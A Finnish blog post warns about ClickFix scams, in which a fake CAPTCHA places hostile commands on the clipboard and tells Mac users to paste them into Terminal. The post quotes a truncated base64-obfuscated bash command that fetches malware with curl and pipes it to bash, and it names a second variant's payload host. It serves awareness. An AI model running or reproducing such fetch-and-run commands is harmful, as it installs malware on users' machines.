lauantai 26. syyskuuta 2026

ClickFix huijaa uhrin asentamaan haittaohjelman

Teknisten suojausten parantuessa rosvot pyrkivät huijaamaan uhria asentamaan haittaohjelman tai antamaan pääsyn pankkitililleen. Traficom varoitti vuosi sitten ClickFix-huijauksista, joissa uhria houkutellaan tekemään toimia pääsyn avaamiseksi.

Olemme tottuneet tekemään erilaisia toimenpiteitä osoittaaksemme, että emme ole robotteja. Kun tällainen huijaus ponnahtaa näytölle, reaktio tulee melkein selkäytimestä.

"Verify you are human"

Hiiren klikkaaminen Cloudflaren ikkunassa tuo näytölle varsinaisen huijauksen:

Vaaralliset komennot Terminaaliin.

Tässä vaiheessa sivu on jo lähettänyt vaaralliset komennot selaimen kautta leikepöydälle. Nyt ne pitäisi vain saada ajettua. Siksi ikkuna neuvoo avamaan Terminal-ikkunan (komentorivin) ja painamaan siellä Ctrl+V.

Kun näin tämän ensi kerran, olin juuri säätämässä Clauden ja Google Chromen yhteiskäyttöä. Se on aiemminkin vaatinut Chromen asetusten vaihtamista, ja toimii silti arvaamattomasti. Oli ihan luonnollista, että taas piti tehdä jotain loitsuja asian korjaamiseksi. Lisäksi kone oli Macbook, jossa tunnetusti ei ole haittaohjelmia (eihän?!).

Kehotus avata Terminaali kuitenkin havahdutti: nyt menee liian pitkälle! Vasta vähän myöhemmin tajusin, että tämähän oli haittaohjelma. Liikkeellä on ainakin kaksi erilaista versiota, toinen pyytää todistamaan ettei ole robotti eikä mainitse Cloudflarea, mutta idea on sama.

Mitä leikepöydältä sitten tulee? Merkkipohjainen teksti (keskeltä leikattu pala pois):

bash <<< $(echo "Y3VybCAtcyAnaHR0cH...RhdGUuc2gnIHwgYmFzaA==" | base64 -d)

Eli base64-koodattu käsky, joka purettuna hakee curl -s komennolla varsinaisen haittaohjelman murretulta palvelimelta ja putkittaa sen lopulta bashille suoritettavaksi. Tässä tapauksessa haittaohjelman haku ei kuitenkaan toiminut, eikä .vip-loppuisesta osoitteesta latautunut mitään. 

Toinen variantti lataa suoraan curl -sfL komennolla linkityksen api-logistics.com sivulle, josta varsinainen haittaohjelma haetaan.

Huijaus näyttää olevan käyttöjärjestelmäkohtainen. Kumpikaan näistä ei aktivoitunut mitenkään Windows-koneella tai älypuhelimella. Huijauksesta kuitenkin on raportoitu myös Windows-versiota, jossa ohjeen hannunvaakuna on korvattu Windows-lipulla.

On hyvä muistaa, että kun kyse on social engineering -tekniikoista, Mac-käyttäjät ovat vähintään yhtä alttiita haittaohjelmille. Ehkä jopa enemmänkin, koska kuvittelevat olevansa turvassa. Ja aina pitäisi jaksaa pysähtyä ja pohtia, mitä onkaan tekemässä, vaikka lupaikkunat ja robottien CAPTCHA-tarkastukset menevätkin ärsyttävyydessään selkäytimeen.

Ei kommentteja: